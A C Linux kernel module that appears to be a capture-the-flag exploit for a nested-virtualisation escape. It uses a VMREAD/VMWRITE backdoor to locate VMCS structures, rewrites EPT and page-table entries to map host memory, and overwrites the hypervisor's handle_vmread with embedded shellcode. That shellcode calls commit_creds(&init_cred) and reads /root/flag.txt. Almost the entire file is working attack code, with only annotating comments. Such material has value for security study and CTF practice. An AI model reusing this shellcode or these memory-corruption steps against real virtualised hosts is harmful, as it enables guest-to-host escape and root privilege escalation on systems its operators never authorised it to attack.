#include <linux/init.h>
#include <linux/slab.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/proc_fs.h>
#include <linux/sched.h>
#include <linux/kprobes.h>
#include <linux/version.h>
#include <linux/efi.h>

#include <asm/uaccess.h>
#include <asm/fsgsbase.h>
#include <asm/io.h>
#include <linux/uaccess.h>

/*
 * Forward declarations of the /proc/exp handlers, needed because the fops
 * table below refers to them before their definitions.
 * NOTE(review): `char* __user buffer` attaches __user to the pointer variable
 * rather than the pointee; sparse's convention is `char __user *buffer`.
 */
static ssize_t proc_read(struct file* filep, char* __user buffer, size_t len, loff_t* offset);
static ssize_t proc_write(struct file* filep, const char* __user u_buffer, size_t len, loff_t* offset);
static int proc_open(struct inode *inode, struct file *filep);


#if LINUX_VERSION_CODE >= KERNEL_VERSION(5,5,0)

static struct proc_ops fops = {
    .proc_open = proc_open,
    .proc_read = proc_read,
    .proc_write = proc_write,
};

#else

static struct file_operations fops = {
    .owner = THIS_MODULE,
    .open = proc_open,
    .read = proc_read,
    .write = proc_write,
};

#endif

/*
 * Byte pattern 0f 78 c6 3e. 0f 78 is the VMREAD opcode, and these four bytes
 * equal the little-endian dword 0x3ec6780f that proc_open() scans for when
 * locating handle_vmread.
 * NOTE(review): this array is not referenced by the code visible here; the
 * scan uses the integer literal instead.
 */
const char kvm_dat[] = "\x0f\x78\xc6\x3e";

/*
 * Payload that proc_open() copies over the start of handle_vmread (the rest
 * of the patched region is NOP padding). The bytes in `shellcode` encode the
 * Intel-syntax listing below. The listing's labels name the kernel functions
 * being called.
 *
 * All absolute offsets are presumably specific to the target L1 kernel build
 * and must be recomputed for any other kernel. These are 0x1008e00, 0xbdad0,
 * 0x1a52ca0, 0x292420, 0x294c70 and 0x18ab000.
 *
 * NOTE(review): the epilogue pops r13 before r14 even though they were pushed
 * in the order r13, r14. On exit, r13 and r14 therefore hold each other's
 * original values; the encoded bytes (41 5d 41 5e) match the listing.
 * r8 is neither saved nor restored.
 * The filp_open() return value is passed to kernel_read() without an
 * IS_ERR check.
 *
 *  push rax
 *  push rbx
 *  push rcx
 *  push rdx
 *  push r9
 *  push r10
 *  push r11
 *  push r12
 *  push r13
 *  push r14
 *  push rdi
 *  push rsi
 *
 *  // get kaslr base: load the 8 bytes at 0xfffffe0000000004 (IDT_BASE + 4,
 *  // i.e. the upper part of IDT entry 0). The constant subtracted is
 *  // presumably tuned so the result is the kernel image base.
 *  mov rax, 0xfffffe0000000004
 *  mov rax, [rax]
 *  sub rax, 0x1008e00
 *
 *  // r12 is kaslr_base
 *  mov r12, rax
 *
 *  // commit_creds
 *  mov r13, r12
 *  add r13, 0xbdad0
 *
 *  // init_cred
 *  mov r14, r12
 *  add r14, 0x1a52ca0
 *
 *  // commit_creds(&init_cred)
 *  mov rdi, r14
 *  call r13
 *
 *  // filp_open
 *  mov r11, r12
 *  add r11, 0x292420
 *
 *  // push /root/flag.txt: the two immediates spell "ag.txt\0\0" and
 *  // "/root/fl" little-endian, so rsp ends up pointing at the full path
 *  mov rax, 0x7478742e6761
 *  push rax
 *  mov rax, 0x6c662f746f6f722f
 *  push rax
 *  mov rdi, rsp
 *
 *  // O_RDONLY
 *  mov rsi, 0
 *
 *  call r11
 *
 *  // r10 is filp_ptr
 *  mov r10, rax
 *
 *  // kernel_read
 *  mov r11, r12
 *  add r11, 0x294c70
 *
 *  // writeable kernel address (destination buffer for the file contents)
 *  mov r9, r12
 *  add r9, 0x18ab000
 *
 *  // kernel_read(filp, buf, 0x100, NULL)
 *  mov rdi, r10
 *  mov rsi, r9
 *  mov rdx, 0x100
 *  mov rcx, 0
 *
 *  call r11
 *
 *  // discard the two qwords holding the path string
 *  pop rax
 *  pop rax
 *
 *  pop rsi
 *  pop rdi
 *  pop r13
 *  pop r14
 *  pop r12
 *  pop r11
 *  pop r10
 *  pop r9
 *  pop rdx
 *  pop rcx
 *  pop rbx
 *  pop rax
 *
 *  // no ret: execution continues into the bytes that follow the copy
 */

const uint8_t shellcode[] = "\x50\x53\x51\x52\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x57\x56\x48\xb8\x04\x00\x00\x00\x00\xfe\xff\xff\x48\x8b\x00\x48\x2d\x00\x8e\x00\x01\x49\x89\xc4\x4d\x89\xe5\x49\x81\xc5\xd0\xda\x0b\x00\x4d\x89\xe6\x49\x81\xc6\xa0\x2c\xa5\x01\x4c\x89\xf7\x41\xff\xd5\x4d\x89\xe3\x49\x81\xc3\x20\x24\x29\x00\x48\xb8\x61\x67\x2e\x74\x78\x74\x00\x00\x50\x48\xb8\x2f\x72\x6f\x6f\x74\x2f\x66\x6c\x50\x48\x89\xe7\x48\xc7\xc6\x00\x00\x00\x00\x41\xff\xd3\x49\x89\xc2\x4d\x89\xe3\x49\x81\xc3\x70\x4c\x29\x00\x4d\x89\xe1\x49\x81\xc1\x00\xb0\x8a\x01\x4c\x89\xd7\x4c\x89\xce\x48\xc7\xc2\x00\x01\x00\x00\x48\xc7\xc1\x00\x00\x00\x00\x41\xff\xd3\x58\x58\x5e\x5f\x41\x5d\x41\x5e\x41\x5c\x41\x5b\x41\x5a\x41\x59\x5a\x59\x5b\x58";

/*
 * Physical addresses of the VMXON region and of the VMCS made current with
 * VMPTRLD. Both are set in proc_init(). find_nested_vmx() searches, through
 * read_guy(), for a pair of qwords holding exactly these two values.
 */
uint64_t vmxon_page_pa, vmptrld_page_pa;

/*
 * Read debug register DR<regno> with a raw MOV.
 *
 * @regno: 0-3, 6 or 7; any other value hits BUG().
 * Returns the register contents (an unsigned long widened to the
 * unsigned long long return type).
 *
 * NOTE(review): these asm statements are neither `volatile` nor given any
 * inputs. GCC may therefore move them relative to surrounding asm, or drop
 * them if the result is unused. read_guy() needs its DR2 read to happen
 * after its VMREAD; consider `asm volatile` here.
 */
static __always_inline unsigned long long native_get_debugreg(int regno)
{
    unsigned long val = 0;    /* presumably initialised only to quiet a gcc warning ("Damn you, gcc!") */

    switch (regno) {
    case 0:
        asm("mov %%db0, %0" :"=r" (val));
        break;
    case 1:
        asm("mov %%db1, %0" :"=r" (val));
        break;
    case 2:
        asm("mov %%db2, %0" :"=r" (val));
        break;
    case 3:
        asm("mov %%db3, %0" :"=r" (val));
        break;
    case 6:
        asm("mov %%db6, %0" :"=r" (val));
        break;
    case 7:
        asm("mov %%db7, %0" :"=r" (val));
        break;
    default:
        BUG();
    }
    return val;
}

/*
 * Write @value into debug register DR<regno> with a raw MOV.
 *
 * @regno: 0-3, 6 or 7; any other value hits BUG().
 * @value: raw value to load. No validation of DR6/DR7 bit layouts is done.
 */
static __always_inline void native_set_debugreg(int regno, unsigned long value)
{
    switch (regno) {
    case 0:
        asm("mov %0, %%db0"    ::"r" (value));
        break;
    case 1:
        asm("mov %0, %%db1"    ::"r" (value));
        break;
    case 2:
        asm("mov %0, %%db2"    ::"r" (value));
        break;
    case 3:
        asm("mov %0, %%db3"    ::"r" (value));
        break;
    case 6:
        asm("mov %0, %%db6"    ::"r" (value));
        break;
    case 7:
        asm("mov %0, %%db7"    ::"r" (value));
        break;
    default:
        BUG();
    }
}

/*
 * Return the raw contents of CR3 (not masked; any low-order flag bits are
 * included).
 */
static noinline uint64_t read_cr3(void)
{
    uint64_t cr3_snapshot = 0;

    asm("mov %%cr3, %0" : "=r" (cr3_snapshot));

    return cr3_snapshot;
}

/*
 * Read one qword through the hypervisor backdoor.
 *
 * Loads DR0 with the magic value 0x1337babe and DR1 with @offset. It then
 * executes a VMREAD (field encoding 0, result discarded) and returns whatever
 * DR2 holds afterwards.
 *
 * Presumably a patched VMREAD exit handler recognises the magic and stores
 * the qword at index @offset of its current vmcs12 into DR2; confirm against
 * the challenge's hypervisor patch. Callers treat @offset as a qword (not
 * byte) index and may pass wrapped "negative" values.
 *
 * NOTE(review): the DR2 read is the non-volatile asm inlined from
 * native_get_debugreg(), so nothing formally orders it after the
 * `asm volatile` VMREAD.
 */
static noinline uint64_t read_guy(unsigned long offset) {
    uint64_t val = 0;

    uint64_t vmread_field = 0;
    uint64_t vmread_value = 0;

    native_set_debugreg(0, 0x1337babe);
    native_set_debugreg(1, offset);
    asm volatile( "vmread %[field], %[output]\n\t"
              : [output] "=r" (vmread_value)
              : [field] "r" (vmread_field) : );
    val = native_get_debugreg(2);

    return val;
}

/*
 * Write one qword through the hypervisor backdoor.
 *
 * Loads DR0 with the magic value 0x1337babe, DR1 with @offset and DR2 with
 * @value, then executes a VMWRITE of 0 to field encoding 0. Presumably the
 * patched VMWRITE exit handler stores DR2 at qword index DR1 of its current
 * vmcs12 instead; confirm against the hypervisor patch.
 *
 * @offset: qword index, same convention as read_guy().
 * @value:  qword to store.
 */
static noinline void write_guy(unsigned long offset, unsigned long value) {
    uint64_t vmwrite_field = 0;
    uint64_t vmwrite_value = 0;

    native_set_debugreg(0, 0x1337babe);
    native_set_debugreg(1, offset);
    native_set_debugreg(2, value);
    asm volatile( "vmwrite %[value], %[field]\n\t"
          :
          : [field] "r" (vmwrite_field),
            [value] "r" (vmwrite_value) : );
}

/* Guest IDTR base value that find_l1_vmcs() searches for. */
#define IDT_BASE 0xfffffe0000000000ull

/*
 * Locate, via read_guy(), the guest_idtr_base field that the original
 * comment attributes to the L1 VM's VMCS.
 *
 * For i in [0, 0x4000) it probes byte offset 0x208 of the page i pages above
 * and of the page i pages below read_guy() index 0, covering up to 64 MiB in
 * each direction. It stops at the first qword equal to IDT_BASE.
 *
 * @l1_vmcs_offset: out; qword index of the match, or 0 if none was found.
 * Returns 1 on success, 0 otherwise. The first 0x20 probe pairs are logged.
 */
static noinline int find_l1_vmcs(uint64_t *l1_vmcs_offset) {
    unsigned long long pos_offset = 0, neg_offset = 0;
    uint64_t zero_val = 0, pos_val = 0, neg_val = 0;
    uint64_t found_val = 0, found_offset = 0;
    uint64_t i = 0;

    zero_val = read_guy(0ull);
    pr_info("vmcs12[0] = %llx\n", zero_val);

    // scan in each direction looking for the guest_idtr_base field of the l1 vm
    for (i = 0; i < 0x4000; i++) {
        // from attaching to the l1 guest, the address of guest_idtr_base always has 0x208 in the lower 3 nibbles
        pos_offset = ((i * 0x1000) + 0x208) / 8;
        // NOTE: evaluated in unsigned 64-bit arithmetic, so this is not a
        // signed index. The numerator is always a multiple of 8, so the
        // division is exact and 8 * neg_offset wraps back to the intended
        // byte displacement -i*0x1000 + 0x208. The value logged below
        // appears as a large unsigned number.
        neg_offset = ((i * -1 * 0x1000) + 0x208) / 8;

        pos_val = read_guy(pos_offset);
        if (pos_val == IDT_BASE) {
            found_val = pos_val;
            found_offset = pos_offset;
            break;
        }

        neg_val = read_guy(neg_offset);
        if (neg_val == IDT_BASE) {
            found_val = neg_val;
            found_offset = neg_offset;
            break;
        }

        if (i < 0x20) {
            pr_info("vmcs12[%llx * 8] = %llx\n", pos_offset, pos_val);
            pr_info("vmcs12[%llx * 8] = %llx\n", neg_offset, neg_val);
        }
    }
    if (found_val == 0) {
        pr_info("[exp]: IDT NOT FOUND :(\n");
        *l1_vmcs_offset = 0;
        return 0;
    } else {
        // NOTE(review): %lld prints the unsigned found_offset as signed
        pr_info("[exp]: Found IDT in l1 at offset %lld; value: %llx\n", found_offset, found_val);
        *l1_vmcs_offset = found_offset;
        return 1;
    }
}

/*
 * Locate, via read_guy(), the pair of qwords holding vmxon_page_pa and
 * vmptrld_page_pa.
 *
 * Only odd indices i in [1, 0x800000) in the positive direction are probed.
 * A match requires vmptrld_page_pa at index i and vmxon_page_pa at index
 * i - 2. Probes with 0x1000 < i < 0x2000 are logged.
 *
 * @nested_vmx_offset: out; index i of the vmptrld_page_pa match, or 0 if
 *                     none was found.
 * Returns 1 on success, 0 otherwise.
 *
 * NOTE(review): neg_offset is assigned but only used by the commented-out
 * code, and neg_val is never read, which will trigger unused warnings.
 */
static noinline int find_nested_vmx(uint64_t *nested_vmx_offset) {
    // the nested_vmx struct contains two known values --
    //     the guest phys addrs of the vmxon_ptr and current_vmptr
    // finding this structure allows us to read the `cached_vmcs12` pointer
    // which is the host virtual address of our vmcs, based on that we can
    // figure out where we are at in the l1's virtual address space

    unsigned long long pos_offset = 0, neg_offset = 0;
    uint64_t zero_val = 0, pos_val = 0, neg_val = 0;
    uint64_t found_val = 0, found_offset = 0;
    uint64_t i = 0;

    zero_val = read_guy(0ull);
    pr_info("vmcs12[0] = %llx\n", zero_val);
    zero_val = read_guy(1ull);
    pr_info("vmcs12[1] = %llx\n", zero_val);
    zero_val = read_guy(0ull);
    pr_info("vmcs12[0] = %llx\n", zero_val);

    // odd indices only: presumably the target fields are known to sit at odd
    // qword indices relative to index 0 — confirm against the layout
    for (i = 1; i < (0x4000*0x200); i += 2) {
        pos_offset = i;
        neg_offset = -i;
        // seen: 0xe8 0x28 0x68

        pos_val = read_guy(pos_offset);
        if (pos_val == vmptrld_page_pa && read_guy(pos_offset-2) == vmxon_page_pa) {
            found_val = pos_val;
            found_offset = pos_offset;
            break;
        }

        // in practice negative offset is rare/impossible?
        // commented out bc it keeps going too far and crashing
        //neg_val = read_guy(neg_offset);
        //if (neg_val == vmptrld_page_pa && read_guy(neg_offset-2) == vmxon_page_pa) {
        //    found_val = neg_val;
        //    found_offset = neg_offset;
        //    break;
        //}

        if (i > 0x1000 && i < 0x2000) {
            pr_info("vmcs12[%llx * 8] = %llx\n", pos_offset, pos_val);
            //pr_info("vmcs12[%llx * 8] = %llx\n", neg_offset, neg_val);
        }
    }
    if (found_val == 0) {
        pr_info("[exp]: L1 VMCS NOT FOUND :(\n");
        *nested_vmx_offset = 0;
        return 0;
    } else {
        pr_info("[exp]: Found vmcs in l1 at offset %lld; value: %llx\n", found_offset, found_val);
        *nested_vmx_offset = found_offset;
        return 1;
    }
}

/*
 * open() handler for /proc/exp: runs the whole sequence every time the entry
 * is opened. Always returns 0, including when a search step fails.
 *
 * Steps (all remote accesses go through read_guy()/write_guy(), whose
 * offsets are qword indices):
 *   1. find_l1_vmcs() and find_nested_vmx() locate two reference points.
 *   2. The qword after the vmptrld match gives the host-virtual address that
 *      indices are relative to. A direct-map base is guessed from it.
 *   3. The EPT is followed from the EPTP, and entry 6 of the table referenced
 *      by its first entry is overwritten.
 *   4. Guest-physical 0x180000000 (6 GiB) is mapped at 0xffff880000000000 in
 *      this kernel's own page tables.
 *   5. handle_vmread is located through that window and overwritten with
 *      `shellcode`, then one more read_guy() triggers it.
 *   6. The window is scanned for a "corctf{" string, which is logged.
 *
 * NOTE(review): several integers are used directly as pointers (pgd,
 * handle_vmread, the memcmp/pr_info arguments) and pointers are printed with
 * %llx. Expect compiler warnings.
 */
static int proc_open(struct inode *inode, struct file *filep) {
    uint64_t l1_vmcs_offset = 0;
    uint64_t nested_vmx_offset = 0;
    uint64_t l2_vmcs_addr = 0;

    uint64_t eptp_value = 0;
    uint64_t ept_offset = 0;
    uint64_t ept_addr = 0;

    uint64_t pml4e_value = 0;
    uint64_t pml4e_offset = 0;
    uint64_t pml4e_addr = 0;

    uint64_t *pgde_page = 0;
    uint64_t pgde_page_pa = 0;

    uint64_t l2_entry = 0;

    uint64_t physbase = 0;
    uint64_t cr3 = 0;
    uint64_t *pgd = 0;

    uint64_t handle_vmread_page = 0;
    uint8_t *handle_vmread = 0;

    uint64_t i;

    if (!find_l1_vmcs(&l1_vmcs_offset)) {
        return 0; // not found
    }

    if (!find_nested_vmx(&nested_vmx_offset)) {
        return 0; // not found
    }

    // per find_nested_vmx's header comment this is the cached_vmcs12 pointer,
    // presumably stored in the qword right after current_vmptr
    l2_vmcs_addr = read_guy(nested_vmx_offset+1);
    pr_info("[exp]: YOU ARE HERE: %llx\n", l2_vmcs_addr);

    // NOTE(review): assumes cached_vmcs12 lies within 256 MiB above a
    // 256 MiB-aligned direct-map base, so clearing the low 28 bits recovers it
    physbase = l2_vmcs_addr & ~0xfffffffull;
    pr_info("[exp]: probably physbase: %llx\n", l2_vmcs_addr & ~0xfffffff);

    // 50 qwords (0x190 bytes) below the guest_idtr_base hit; presumably the
    // ept_pointer field of the same vmcs12 — confirm the layout for the target
    eptp_value = read_guy(l1_vmcs_offset-50);
    pr_info("[exp]: eptp_value: %llx\n", eptp_value);

    // EPT root physical address translated through the guessed direct map
    ept_addr = physbase + (eptp_value & ~0xfffull);
    pr_info("[exp]: ept_addr: %llx\n", ept_addr);

    // converted to a qword index relative to l2_vmcs_addr, the unit read_guy() takes
    ept_offset = (ept_addr-l2_vmcs_addr) / 8;
    pr_info("[exp]: ept_offset: %llx\n", ept_offset);

    // read first entry in ept to get the PML4E
    pml4e_value = read_guy(ept_offset);
    pr_info("[exp]: pml4e_value: %llx\n", pml4e_value);

    // despite the name, this is the next-level table referenced by that
    // PML4 entry, not the PML4 itself
    pml4e_addr = physbase + (pml4e_value & ~0xfffull);
    pr_info("[exp]: pml4e_addr: %llx\n", pml4e_addr);

    pml4e_offset = (pml4e_addr-l2_vmcs_addr) / 8;
    pr_info("[exp]: pml4e_offset: %llx\n", pml4e_offset);

    // at 6GB will be an identity mapping of the l1 memory in l2
    // 0x987 sets bits 0-2 and 7 (plus 8 and 11) with a zero address field;
    // presumably an RWX 1 GiB leaf starting at physical 0 — confirm bits
    write_guy(pml4e_offset + 6, 0x987);

    // this kernel's top-level page table, reached through page_offset_base
    cr3 = read_cr3();
    pgd = (cr3 & ~0xfffull) + page_offset_base;
    pr_info("[exp]: pgd: %llx\n", pgd);

    // NOTE(review): kzalloc result is not checked. The page is intentionally
    // never freed, since it stays linked into the page tables.
    pgde_page = kzalloc(0x1000, GFP_KERNEL);
    pgde_page_pa = virt_to_phys(pgde_page);

    // sticking the l1 mapping at the PGD entry the LDT remap usually goes at cuz why not
    // (272 << 39 == 0x880000000000, i.e. 0xffff880000000000 once sign-extended)
    pgd[272] = pgde_page_pa | 0x7;

    // huge and rwxp: 1 GiB page (bit 7), present|writable (0x3), at
    // 0x180000000 == 6 GiB, the region covered by the EPT entry written above
    l2_entry = 0x180000000 | (1<<7) | 0x3;

    pgde_page[0] = l2_entry;

    // in THEORY I can access memory at 0xffff880000000000 now
    pr_info("TEST: %llx\n", *((uint64_t *)0xffff880000000000));

    // look for 0x3ec6780f to find the page where handle_vmread is at
    // (probes offset 0xdf8 of each 4 KiB page in the 1 GiB window)
    // NOTE(review): 0xdf8 and 0x4d0 are build-specific. If nothing matches,
    // handle_vmread_page stays 0 and the memset below targets address 0x4d0.
    for (i = 0; i < (1024ull << 20); i += 0x1000) {
        unsigned int val = *((unsigned int *)(0xffff880000000df8 + i));

        // check the value and check if relocations were applied
        if (val == 0x3ec6780f && *((unsigned int *)(0xffff880000000df8 + 0xb + i)) != 0) {
            handle_vmread_page = 0xffff880000000000 + i;
            break;
        }
    }

    pr_info("found handle_vmread page at: %llx\n", handle_vmread_page);

    handle_vmread = handle_vmread_page + 0x4d0;
    pr_info("handle_vmread at: %llx\n", handle_vmread);

    // I don't want to figure out the address of nested_vmx_succeeded so pad with nops just up to that call
    // and make the instruction just after nested_vmx_succeeded returns be ret
    // (bytes 0x281..0x285 are left untouched; shellcode must fit in 0x281 bytes)
    memset(handle_vmread, 0x90, 0x281);
    handle_vmread[0x286] = 0xc3;

    // -1 to remove null terminator
    memcpy(handle_vmread, shellcode, sizeof(shellcode)-1);

    // do it: one more backdoor access, presumably now running the patched handle_vmread
    read_guy(0);

    // scan for flag in memory (page-aligned "corctf{" prefix within the window)
    for (i = 0; i < 1024ull << 20; i+= 0x1000) {
        if (!memcmp(0xffff880000000000 + i, "corctf{", 7)) {
            pr_info("flag: %s\n", 0xffff880000000000 + i);
            break;
        }
    }

    return 0;
}

static ssize_t proc_read(struct file* filep, char* __user buffer, size_t len, loff_t* offset) {
    /* Nothing to read: every read reports end-of-file immediately. */
    (void)filep;
    (void)buffer;
    (void)len;
    (void)offset;

    return 0;
}

static ssize_t proc_write(struct file* filep, const char* __user u_buffer, size_t len, loff_t* offset) {
    /* Input is ignored; the handler reports that zero bytes were consumed. */
    (void)filep;
    (void)u_buffer;
    (void)len;
    (void)offset;

    return 0;
}

/*
 * Load @val into CR4 with a raw MOV.
 *
 * @val: the complete new CR4 value (not a mask of bits to change).
 *
 * External linkage and the exact prototype are kept on purpose. The kernel
 * declares a native_write_cr4() with this signature, and a static definition
 * would conflict with that declaration if it is in scope.
 *
 * MOV to CR4 only reads its source register, so @val is an input operand.
 * The former "+r" constraint wrongly told the compiler it was modified.
 * The unused local `bits_changed` was removed; it triggered
 * -Wunused-variable, which is fatal under CONFIG_WERROR.
 */
void __no_profile native_write_cr4(unsigned long val)
{
    asm volatile("mov %0, %%cr4" : : "r" (val) : "memory");
}

/*
 * Execute VMXON with the region at physical address @phys.
 *
 * VMXON takes a memory operand containing the physical address. SETNA stores
 * 1 if CF or ZF is set after the instruction (VMfailInvalid / VMfailValid)
 * and 0 on success; that byte is the return value.
 */
static inline int vmxon(uint64_t phys)
{
    uint8_t failed;

    __asm__ __volatile__("vmxon %[region_pa]\n\t"
                         "setna %[status]"
                         : [status] "=rm" (failed)
                         : [region_pa] "m" (phys)
                         : "cc", "memory");

    return failed;
}

/*
 * Make the VMCS at physical address @vmcs_pa current with VMPTRLD.
 *
 * Returns the SETNA result: 1 if CF or ZF was set (the instruction failed),
 * 0 on success.
 */
static inline int vmptrld(uint64_t vmcs_pa)
{
    uint8_t failed;

    __asm__ __volatile__("vmptrld %[vmcs_region]\n\t"
                         "setna %[status]"
                         : [status] "=rm" (failed)
                         : [vmcs_region] "m" (vmcs_pa)
                         : "cc", "memory");

    return failed;
}


/*
 * Read model-specific register @msr with RDMSR.
 *
 * RDMSR takes the MSR index in ECX and returns the value split across
 * EDX (high half) and EAX (low half); the halves are recombined here.
 */
static inline uint64_t rdmsr_guy(uint32_t msr)
{
    uint32_t lo, hi;
    uint64_t combined;

    __asm__ __volatile__("rdmsr" : "=a" (lo), "=d" (hi) : "c" (msr) : "memory");

    combined = hi;
    combined <<= 32;
    combined |= lo;

    return combined;
}


/*
 * Return the low 32 bits of IA32_VMX_BASIC.
 *
 * Bits 30:0 of that MSR are the VMCS revision identifier that must start
 * every VMXON region and VMCS, and bit 31 is architecturally 0. The
 * truncated low dword is therefore the identifier.
 */
static inline uint32_t vmcs_revision(void)
{
    uint64_t vmx_basic = rdmsr_guy(MSR_IA32_VMX_BASIC);

    return (uint32_t)vmx_basic;
}

/*
 * Module init: enter VMX operation on the current CPU and register /proc/exp.
 *
 * 1. Allocates one zeroed page for the VMXON region and one for a VMCS.
 * 2. Sets CR4 bit 13 (VMXE).
 * 3. Stamps both pages with the VMCS revision identifier.
 * 4. Executes VMXON and VMPTRLD.
 * 5. Records the two physical addresses in vmxon_page_pa / vmptrld_page_pa.
 *
 * VMXON/VMPTRLD failures are only logged, as before.
 *
 * Returns 0 on success, or -ENOMEM if a page allocation or proc_create()
 * fails. Previously allocation failures were dereferenced and a failed
 * proc_create() was silently reported as success.
 *
 * NOTE(review): init runs in preemptible context, so nothing pins the CR4
 * write, VMXON and VMPTRLD to the same CPU. Once VMXON may have used the
 * pages they must not be freed, so the proc_create() failure path
 * deliberately leaks them.
 */
static int __init proc_init(void)
{
    void *vmxon_page, *vmptrld_page;
    struct proc_dir_entry *entry;
    unsigned long cr4;
    int res;

    vmxon_page = kzalloc(0x1000, GFP_KERNEL);
    vmptrld_page = kzalloc(0x1000, GFP_KERNEL);
    if (!vmxon_page || !vmptrld_page) {
        pr_err("[exp]: page allocation failed\n");
        kfree(vmxon_page);      /* kfree(NULL) is a no-op */
        kfree(vmptrld_page);
        return -ENOMEM;
    }

    /* CR4 bit 13 is VMXE; VMXON raises #UD unless it is set. */
    cr4 = native_read_cr4();
    cr4 |= 1ul << 13;
    native_write_cr4(cr4);
    pr_info("[exp]: set cr4 to %lx\n", cr4);

    vmxon_page_pa = virt_to_phys(vmxon_page);
    vmptrld_page_pa = virt_to_phys(vmptrld_page);

    /* Both regions must begin with the VMCS revision identifier. */
    *(uint32_t *)(vmxon_page) = vmcs_revision();
    *(uint32_t *)(vmptrld_page) = vmcs_revision();

    res = vmxon(vmxon_page_pa);
    pr_info("[exp]: vmxon returned %d\n", res);

    res = vmptrld(vmptrld_page_pa);
    pr_info("[exp]: vmptrld returned %d\n", res);

    pr_info("[exp]: vmxon_pa %llx\n", vmxon_page_pa);
    pr_info("[exp]: vmptrld_pa %llx\n", vmptrld_page_pa);

    pr_info("page_offset_base: %lx\n", page_offset_base);

    entry = proc_create("exp", 0777, NULL, &fops);
    if (!entry) {
        pr_err("[exp]: proc_create failed\n");
        return -ENOMEM;
    }

    pr_info("[exp]: init\n");
    return 0;
}

/* Module exit: unregister the /proc/exp entry and log the unload. */
static void __exit proc_exit(void)
{
    const char *entry_name = "exp";

    remove_proc_entry(entry_name, NULL);
    pr_info("exp: exit\n");
}

/* Module entry/exit hooks and metadata. */
module_init(proc_init);
module_exit(proc_exit);

MODULE_LICENSE("GPL");
MODULE_AUTHOR("zolutal");
MODULE_DESCRIPTION("bleh");
MODULE_VERSION("0.1");
